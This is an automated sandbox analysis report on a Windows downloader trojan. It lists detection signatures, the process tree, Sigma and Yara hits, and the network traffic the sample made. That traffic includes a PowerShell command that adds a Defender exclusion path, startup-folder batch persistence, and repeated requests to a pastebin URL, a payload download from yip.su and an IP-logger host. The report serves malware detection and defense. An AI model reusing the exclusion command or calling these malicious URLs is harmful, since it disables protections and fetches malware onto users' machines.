Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
Analysis ID:1512141
MD5:ec3afdbd761916a682e9372834365939
SHA1:35e3b8bc572d9ceadb2d519c4013fcf3632da802
SHA256:6e4422d8d101bf53165220c1fce47839b23a41057420d070fb909979415553f8
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Connects to a pastebin service (likely for C&C)
Creates HTML files with .exe extension (expired dropper behavior)
Disables UAC (registry)
Drops script or batch files to the startup folder
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe (PID: 3224 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe" MD5: EC3AFDBD761916A682E9372834365939)
    • conhost.exe (PID: 2748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2852 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7692 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • AddInProcess32.exe (PID: 5552 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • jsc.exe (PID: 4864 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
    • MSBuild.exe (PID: 1340 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • svchost.exe (PID: 5700 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 3392 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5308 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATW4YMuey528R5HSnE54AwE5.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5164 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HmybwgSSguRbNIGR4y7xNho1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3KsdkaRiL7RacJah2YobpSxj.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7880 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u0RvkxN9wEthGCCLh4tn7zqU.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3184 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4KsgxmPNACDuZ2zjqQjtltvX.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4016 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3njSfWDGOVl28Hs8hyJ6Y7LT.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 764 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBBVbA3zq6R2KekyMmBCsddO.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9O41Qow2bZeAiNaUuBCU9sI8.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4592 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FLz6tWFKVQbppt2Sn3SWxNu4.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2884 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p8NYZUwJycflpNiJIlSTOBho.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5044 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aPLL8m8adxhtzUUH2fMBYP78.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdci9HHJSUc0QT0L7qkU4ePj.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4996 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nGizfduNOl4JVOkYHOr4NIAN.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6724 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NtFoY6Vi2WtE4qAcwOzUXMHK.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5028 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v6vceHiI5YDkGCej6J99jPOi.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6992 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C8TVyoaND4r7GWzWKeeVLeMP.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1864 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fKQUct9QxCcX5qlUcu38pRMl.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6440 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBNY7HBfHixtkjGDaljf7VCr.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7784 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jl2Nqcc7XWeOOYztXFcYbkmD.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7372 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NQwtNbU54qs5kl5tTGMFFPkC.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7116 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OK2XFEh3D7xuLDF5l083mPKW.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6252 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p04DXHk7aV49bHDBuFA6B2XV.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
7.2.MSBuild.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    0.2.SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe.19c1ecfc040.3.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      0.2.SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe.19c1ea11f30.4.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        0.2.SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe.19c1ea1add8.2.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, ParentProcessId: 3224, ParentProcessName: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 2852, ProcessName: powershell.exe
          Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 104.20.4.235, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 1340, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49713
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, ParentProcessId: 3224, ParentProcessName: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 2852, ProcessName: powershell.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, ParentProcessId: 3224, ParentProcessName: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 2852, ProcessName: powershell.exe
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5700, ProcessName: svchost.exe

          Data Obfuscation

          barindex
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 1340, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeAvira: detected
          Source: https://yip.su/RNWPd.exeAvira URL Cloud: Label: malware
          Source: https://pastebin.com/raw/V6VJsrV3Avira URL Cloud: Label: malware
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeReversingLabs: Detection: 60%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.6:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49740 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49796 version: TLS 1.2
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\

          Networking

          barindex
          Source: unknownDNS query: name: pastebin.com
          Source: unknownDNS query: name: pastebin.com
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: Zu7wa3hTioo41CyobTIbG45C.exe.7.dr
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr
          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe.19c1ecfc040.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe.19c1ea11f30.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe.19c1ea1add8.2.raw.unpack, type: UNPACKEDPE
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
